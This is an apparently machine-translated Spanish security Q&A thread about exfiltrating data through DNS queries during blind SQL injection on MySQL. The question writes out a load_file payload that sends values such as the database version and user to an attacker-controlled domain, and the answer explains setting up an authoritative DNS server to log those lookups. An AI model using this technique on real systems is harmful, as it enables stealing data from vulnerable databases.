Inyección de SQL ciego mediante la ayuda práctica de OOB DNS Practical Sniffing

3

Estaba buscando un excelente artículo de Defcon 15, que era la recuperación de datos a través de DNS durante los ataques de inyección de SQL. ( enlace ). En esto, el orador demostró los ataques contra MSSQL.

Acabo de intentar reproducir el mismo problema, pero con el servidor MySQL, por una pequeña búsqueda encontré que load_file(\\dns.mysite.com\) puede golpear al servidor DNS exponiendo cualquier concentrado de atacantes en load_file() como @@ versión, usuario () etc. si el La aplicación es vulnerable . La pregunta es ¿Cómo podría realmente mantener la solicitud SNIFF EL DNS en mi servidor? Al mirar en el video, el orador utiliza un sniffer de DNS para registrar la solicitud de acceso del sitio vulnerable a su servidor.

¿Alguien tiene entradas sobre cómo configurar prácticamente el servidor web de un atacante (mysite.com) mediante DNS Sniffing o cualquier otra técnica que no haya podido ver aquí?

    
pregunta Gerorge Timber 17.06.2016 - 18:30
fuente

1 respuesta

2

Video interesante. En mi opinión, para configurar este tipo de técnica, necesita:

  1. Sea propietario de un nombre de dominio, por ejemplo, mysite.com

  2. Cada nombre de dominio tiene un "Servidor de nombres autorizado". Por lo general, el servidor de nombres Autoritativo está administrado por la compañía que le vendió el nombre de dominio.

  3. Debe configurar su propio servidor DNS autoritativo en una dirección IP pública, luego pedirle a la compañía que le vendió el nombre de dominio que establezca su servidor DNS como el servidor de nombres autoritativo para su dominio.

  4. Ahora es el propietario del servidor DNS que responderá a la consulta DNS realizada por este sitio web / aplicación supuestamente vulnerable

  5. Debido a que posee el servidor DNS, simplemente puede registrar todas las solicitudes de DNS, que contendrán sus datos.
    O tal vez prefiera configurar un sniffer, como Wireshark, en el servidor DNS, para simplemente rastrear las solicitudes de DNS en tiempo real.

Nota: nunca intenté configurar un servidor de nombres autoritativo, así que no sé si hay alguna cosa en particular (técnica o burocrática) que hacer.

Nota 2: las modificaciones de DNS toman tiempo en propagarse, por lo que supongo que también un cambio de servidor de nombres Autoritativo tomará algún tiempo para propagarse en todo el mundo.

    
respondido por el Max 22.06.2016 - 22:49
fuente

Lea otras preguntas en las etiquetas